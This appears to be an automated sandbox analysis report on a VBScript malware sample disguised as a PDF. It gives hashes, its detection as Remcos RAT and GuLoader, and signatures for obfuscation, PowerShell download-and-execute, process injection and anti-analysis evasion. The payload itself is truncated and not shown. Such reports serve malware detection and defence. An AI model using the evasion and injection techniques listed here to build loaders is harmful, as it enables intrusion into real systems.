Windows
Analysis Report
AF85714759_htm#U00b7pdf.vbs
Overview
General Information
Sample name: | AF85714759_htm#U00b7pdf.vbs (renamed because the original name is a hash value) |
Original sample name: | AF85714759_htmpdf.vbs |
Analysis ID: | 1466654 |
MD5: | e31a921fa7bbdb8a49fec66db0fed99e |
SHA1: | f43505f1553c845626c6a1a4284277c6ac32679c |
SHA256: | d991c4cf68d0fa2019a6fb61bb5197a33512372076fac18e6867e598612e8c73 |
Tags: | vbs |
Infos: | |
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6928 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\AF85714759_htm#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
powershell.exe (PID: 4416 cmdline:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [followed by a long obfuscated PowerShell script, truncated in the report])